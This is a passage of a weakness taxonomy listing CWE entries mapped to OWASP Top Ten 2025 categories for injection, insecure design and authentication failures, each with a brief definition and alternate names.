(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
159
(Improper Handling of Invalid Use of Special Elements)
The product does not properly filter, remove, quote, or otherwise manage the invalid use of special elements in user-controlled input, which could cause adverse effect on its behavior and integrity.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
20
(Improper Input Validation)
The product receives input or data, but it does
not validate or incorrectly validates that the input has the
properties that are required to process the data safely and
correctly.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
470
(Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection'))
The product uses external input with reflection to select which classes or code to use, but it does not sufficiently prevent the input from selecting improper classes or code.
Reflection Injection
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
493
(Critical Public Variable Without Final Modifier)
The product has a critical public variable that is not final, which allows the variable to be modified to contain unexpected values.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
500
(Public Static Field Not Marked Final)
An object contains a public static field that is not marked final, which might allow it to be modified in unexpected ways.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
564
(SQL Injection: Hibernate)
Using Hibernate to execute a dynamic SQL statement built with user-controlled input can allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
610
(Externally Controlled Reference to a Resource in Another Sphere)
The product uses an externally controlled name or reference that resolves to a resource that is outside of the intended control sphere.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
643
(Improper Neutralization of Data within XPath Expressions ('XPath Injection'))
The product uses external input to dynamically construct an XPath expression used to retrieve data from an XML database, but it does not neutralize or incorrectly neutralizes that input. This allows an attacker to control the structure of the query.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
644
(Improper Neutralization of HTTP Headers for Scripting Syntax)
The product does not neutralize or incorrectly neutralizes web scripting syntax in HTTP headers that can be used by web browser components that can process raw headers, such as Flash.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
74
(Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection'))
The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
76
(Improper Neutralization of Equivalent Special Elements)
The product correctly neutralizes certain special elements, but it improperly neutralizes equivalent special elements.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
77
(Improper Neutralization of Special Elements used in a Command ('Command Injection'))
The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
Command injection
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
78
(Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'))
The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
Shell injection
Shell metacharacters
OS Command Injection
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
79
(Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'))
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
XSS
HTML Injection
Reflected XSS / Non-Persistent XSS / Type 1 XSS
Stored XSS / Persistent XSS / Type 2 XSS
DOM-Based XSS / Type 0 XSS
CSS
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
80
(Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS))
The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as "<", ">", and "&" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
83
(Improper Neutralization of Script in Attributes in a Web Page)
The product does not neutralize or incorrectly neutralizes "javascript:" or other URIs from dangerous attributes within tags, such as onmouseover, onload, onerror, or style.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
86
(Improper Neutralization of Invalid Characters in Identifiers in Web Pages)
The product does not neutralize or incorrectly neutralizes invalid characters or byte sequences in the middle of tag names, URI schemes, and other identifiers.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
88
(Improper Neutralization of Argument Delimiters in a Command ('Argument Injection'))
The product constructs a string for a command to be executed by a separate component
in another control sphere, but it does not properly delimit the
intended arguments, options, or switches within that command string.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
89
(Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'))
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.
SQL injection
SQLi
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
90
(Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection'))
The product constructs all or part of an LDAP query using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended LDAP query when it is sent to a downstream component.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
91
(XML Injection (aka Blind XPath Injection))
The product does not properly neutralize special elements that are used in XML, allowing attackers to modify the syntax, content, or commands of the XML before it is processed by an end system.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
917
(Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection'))
The product constructs all or part of an expression language (EL) statement in a framework such as a Java Server Page (JSP) using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended EL statement before it is executed.
EL Injection
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
93
(Improper Neutralization of CRLF Sequences ('CRLF Injection'))
The product uses CRLF (carriage return line feeds) as a special element, e.g. to separate lines or records, but it does not neutralize or incorrectly neutralizes CRLF sequences from inputs.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
94
(Improper Control of Generation of Code ('Code Injection'))
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.
Code Injection
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
95
(Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection'))
The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before using the input in a dynamic evaluation call (e.g. "eval").
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
96
(Improper Neutralization of Directives in Statically Saved Code ('Static Code Injection'))
The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before inserting the input into an executable resource, such as a library, configuration file, or template.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
97
(Improper Neutralization of Server-Side Includes (SSI) Within a Web Page)
The product generates a web page, but does not neutralize or incorrectly neutralizes user-controllable input that could be interpreted as a server-side include (SSI) directive.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
98
(Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion'))
The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in "require," "include," or similar functions.
Remote file include
RFI
Local file inclusion
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
99
(Improper Control of Resource Identifiers ('Resource Injection'))
The product receives input from an upstream component, but it does not restrict or incorrectly restricts the input before it is used as an identifier for a resource that may be outside the intended sphere of control.
Insecure Direct Object Reference
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design)
Weaknesses in this category are related to the A06 category "Insecure Design" in the OWASP Top Ten 2025.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
1021
(Improper Restriction of Rendered UI Layers or Frames)
The web application does not restrict or incorrectly restricts frame objects or UI layers that belong to another application or domain, which can lead to user confusion about which interface the user is interacting with.
Clickjacking
UI Redress Attack
Tapjacking
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
1022
(Use of Web Link to Untrusted Target with window.opener Access)
The web application produces links to untrusted external sites outside of its sphere of control, but it does not properly prevent the external site from modifying security-critical properties of the window.opener object, such as the location property.
tabnabbing
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
1125
(Excessive Attack Surface)
The product has an attack surface whose quantitative
measurement exceeds a desirable maximum.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
183
(Permissive List of Allowed Inputs)
The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are explicitly allowed by policy because the inputs are assumed to be safe, but the list is too permissive - that is, it allows an input that is unsafe, leading to resultant weaknesses.
Allowlist / Allow List
Safelist / Safe List
Whitelist / White List
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
256
(Plaintext Storage of a Password)
The product stores a password in plaintext within resources such as memory or files.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
266
(Incorrect Privilege Assignment)
A product incorrectly assigns a privilege to a particular actor, creating an unintended sphere of control for that actor.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
269
(Improper Privilege Management)
The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
286
(Incorrect User Management)
The product does not properly manage a user within its environment.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
311
(Missing Encryption of Sensitive Data)
The product does not encrypt sensitive or critical information before storage or transmission.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
312
(Cleartext Storage of Sensitive Information)
The product stores sensitive information in cleartext within a resource that might be accessible to another control sphere.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
313
(Cleartext Storage in a File or on Disk)
The product stores sensitive information in cleartext in a file, or on disk.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
316
(Cleartext Storage of Sensitive Information in Memory)
The product stores sensitive information in cleartext in memory.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
362
(Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition'))
The product contains a concurrent code sequence that requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence operating concurrently.
Race Condition
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
382
(J2EE Bad Practices: Use of System.exit())
A J2EE application uses System.exit(), which also shuts down its container.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
419
(Unprotected Primary Channel)
The product uses a primary channel for administration or restricted functionality, but it does not properly protect the channel.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
434
(Unrestricted Upload of File with Dangerous Type)
The product allows the upload or transfer of dangerous file types that are automatically processed within its environment.
Unrestricted File Upload
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
436
(Interpretation Conflict)
Product A handles inputs or steps differently than Product B, which causes A to perform incorrect actions based on its perception of B's state.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
444
(Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling'))
The product acts as an intermediary HTTP agent
(such as a proxy or firewall) in the data flow between two
entities such as a client and server, but it does not
interpret malformed HTTP requests or responses in ways that
are consistent with how the messages will be processed by
those entities that are at the ultimate destination.
HTTP Request Smuggling
HTTP Response Smuggling
HTTP Smuggling
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
451
(User Interface (UI) Misrepresentation of Critical Information)
The user interface (UI) does not properly represent critical information to the user, allowing the information - or its source - to be obscured or spoofed. This is often a component in phishing attacks.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
454
(External Initialization of Trusted Variables or Data Stores)
The product initializes critical internal variables or data stores using inputs that can be modified by untrusted actors.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
472
(External Control of Assumed-Immutable Web Parameter)
The web application does not sufficiently verify inputs that are assumed to be immutable but are actually externally controllable, such as hidden form fields.
Assumed-Immutable Parameter Tampering
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
501
(Trust Boundary Violation)
The product mixes trusted and untrusted data in the same data structure or structured message.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
522
(Insufficiently Protected Credentials)
The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
525
(Use of Web Browser Cache Containing Sensitive Information)
The web application does not use an appropriate caching policy that specifies the extent to which each web page and associated form fields should be cached.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
539
(Use of Persistent Cookies Containing Sensitive Information)
The web application uses persistent cookies, but the cookies contain sensitive information.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
598
(Use of GET Request Method With Sensitive Query Strings)
The web application uses the HTTP GET method to process a request and includes sensitive information in the query string of that request.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
602
(Client-Side Enforcement of Server-Side Security)
The product is composed of a server that relies on the client to implement a mechanism that is intended to protect the server.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
628
(Function Call with Incorrectly Specified Arguments)
The product calls a function, procedure, or routine with arguments that are not correctly specified, leading to always-incorrect behavior and resultant weaknesses.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
642
(External Control of Critical State Data)
The product stores security-critical state information about its users, or the product itself, in a location that is accessible to unauthorized actors.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
646
(Reliance on File Name or Extension of Externally-Supplied File)
The product allows a file to be uploaded, but it relies on the file name or extension of the file to determine the appropriate behaviors. This could be used by attackers to cause the file to be misclassified and processed in a dangerous fashion.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
653
(Improper Isolation or Compartmentalization)
The product does not properly compartmentalize or isolate functionality, processes, or resources that require different privilege levels, rights, or permissions.
Separation of Privilege
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
656
(Reliance on Security Through Obscurity)
The product uses a protection mechanism whose strength depends heavily on its obscurity, such that knowledge of its algorithms or key data is sufficient to defeat the mechanism.
Never Assuming your secrets are safe
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
657
(Violation of Secure Design Principles)
The product violates well-established principles for secure design.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
676
(Use of Potentially Dangerous Function)
The product invokes a potentially dangerous function that could introduce a vulnerability if it is used incorrectly, but the function can also be used safely.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
693
(Protection Mechanism Failure)
The product does not use or incorrectly uses a protection mechanism that provides sufficient defense against directed attacks against the product.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
73
(External Control of File Name or Path)
The product allows user input to control or influence paths or file names that are used in filesystem operations.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
799
(Improper Control of Interaction Frequency)
The product does not properly limit the number or frequency of interactions that it has with an actor, such as the number of incoming requests.
Insufficient anti-automation
Brute force
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
807
(Reliance on Untrusted Inputs in a Security Decision)
The product uses a protection mechanism that relies on the existence or values of an input, but the input can be modified by an untrusted actor in a way that bypasses the protection mechanism.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1441
(OWASP Top Ten 2025 Category A06:2025 - Insecure Design) >
841
(Improper Enforcement of Behavioral Workflow)
The product supports a session in which more than one behavior must be performed by an actor, but it does not properly ensure that the actor performs the behaviors in the required sequence.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures)
Weaknesses in this category are related to the A07 category "Authentication Failures" in the OWASP Top Ten 2025.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
1390
(Weak Authentication)
The product uses an authentication mechanism to restrict access to specific users or identities, but the mechanism does not sufficiently prove that the claimed identity is correct.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
1391
(Use of Weak Credentials)
The product uses weak credentials (such as a default key or hard-coded password) that can be calculated, derived, reused, or guessed by an attacker.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
1392
(Use of Default Credentials)
The product uses default credentials (such as passwords or cryptographic keys) for potentially critical functionality.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
1393
(Use of Default Password)
The product uses default passwords for potentially critical functionality.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
258
(Empty Password in Configuration File)
Using an empty string as a password is insecure.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
259
(Use of Hard-coded Password)
The product contains a hard-coded password, which it uses for its own inbound authentication or for outbound communication to external components.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
287
(Improper Authentication)
When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct.
authentification
AuthN
AuthC
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
288
(Authentication Bypass Using an Alternate Path or Channel)
The product requires authentication, but the product has an alternate path or channel that does not require authentication.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
289
(Authentication Bypass by Alternate Name)
The product performs authentication based on the name of a resource being accessed, or the name of the actor performing the access, but it does not properly check all possible names for that resource or actor.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
290
(Authentication Bypass by Spoofing)
This attack-focused weakness is caused by incorrectly implemented authentication schemes that are subject to spoofing attacks.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
291
(Reliance on IP Address for Authentication)
The product uses an IP address for authentication.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
293
(Using Referer Field for Authentication)
The referer field in HTTP requests can be easily modified and, as such, is not a valid means of message integrity checking.
referrer
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
294
(Authentication Bypass by Capture-replay)
A capture-replay flaw exists when the design of the product makes it possible for a malicious user to sniff network traffic and bypass authentication by replaying it to the server in question to the same effect as the original message (or with minor changes).
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
295
(Improper Certificate Validation)
The product does not validate, or incorrectly validates, a certificate.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
297
(Improper Validation of Certificate with Host Mismatch)
The product communicates with a host that provides a certificate, but the product does not properly ensure that the certificate is actually associated with that host.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
298
(Improper Validation of Certificate Expiration)
A certificate expiration is not validated or is incorrectly validated, so trust may be assigned to certificates that have been abandoned due to age.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
299
(Improper Check for Certificate Revocation)
The product does not check or incorrectly checks the revocation status of a certificate, which may cause it to use a certificate that has been compromised.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
300
(Channel Accessible by Non-Endpoint)
The product does not adequately verify the identity of actors at both ends of a communication channel, or does not adequately ensure the integrity of the channel, in a way that allows the channel to be accessed or influenced by an actor that is not an endpoint.
Adversary-in-the-Middle / AITM
Attacker-in-the-Middle / AITM
Man-in-the-Middle / MITM
Person-in-the-Middle / PITM
Monkey-in-the-Middle
Monster-in-the-Middle
Manipulator-in-the-Middle
On-path attack
Interception attack
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
302
(Authentication Bypass by Assumed-Immutable Data)
The authentication scheme or implementation uses key data elements that are assumed to be immutable, but can be controlled or modified by the attacker.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
303
(Incorrect Implementation of Authentication Algorithm)
The requirements for the product dictate the use of an established authentication algorithm, but the implementation of the algorithm is incorrect.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
304
(Missing Critical Step in Authentication)
The product implements an authentication technique, but it skips a step that weakens the technique.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
305
(Authentication Bypass by Primary Weakness)
The authentication algorithm is sound, but the implemented mechanism can be bypassed as the result of a separate weakness that is primary to the authentication error.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
306
(Missing Authentication for Critical Function)
The product does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
307
(Improper Restriction of Excessive Authentication Attempts)
The product does not implement sufficient measures to prevent multiple failed authentication attempts within a short time frame.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
308
(Use of Single-factor Authentication)
The product uses an authentication algorithm that uses a single factor (e.g., a password) in a security context that should require more than one factor.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
309
(Use of Password System for Primary Authentication)
The use of password systems as the primary means of authentication may be subject to several flaws or shortcomings, each reducing the effectiveness of the mechanism.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
346
(Origin Validation Error)
The product does not properly verify that the source of data or communication is valid.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
350
(Reliance on Reverse DNS Resolution for a Security-Critical Action)
The product performs reverse DNS resolution on an IP address to obtain the hostname and make a security decision, but it does not properly ensure that the IP address is truly associated with the hostname.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
384
(Session Fixation)
Authenticating a user, or otherwise establishing a new user session, without invalidating any existing session identifier gives an attacker the opportunity to steal authenticated sessions.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
521
(Weak Password Requirements)
The product does not require that users should have strong passwords.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
613
(Insufficient Session Expiration)
According to WASC, "Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization."
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
620
(Unverified Password Change)
When setting a new password for a user, the product does not require knowledge of the original password, or using another form of authentication.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
640
(Weak Password Recovery Mechanism for Forgotten Password)
The product contains a mechanism for users to recover or change their passwords without knowing the original password, but the mechanism is weak.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
798
(Use of Hard-coded Credentials)
The product contains hard-coded credentials, such as a password or cryptographic key.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
940
(Improper Verification of Source of a Communication Channel)
The product establishes a communication channel to handle an incoming request that has been initiated by an actor, but it does not properly verify that the request is coming from the expected origin.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1442
(OWASP Top Ten 2025 Category A07:2025 - Authentication Failures) >
941
(Incorrectly Specified Destination in a Communication Channel)
The product creates a communication channel to initiate an outgoing request to an actor, but it does not correctly specify the intended destination for that actor.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1443
(OWASP Top Ten 2025 Category A08:2025 - Software or Data Integrity Failures)
Weaknesses in this category are related to the A08 category "Software or Data Integrity Failures" in the OWASP Top Ten 2025.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1443
(OWASP Top Ten 2025 Category A08:2025 - Software or Data Integrity Failures) >
345
(Insufficient Verification of Data Authenticity)
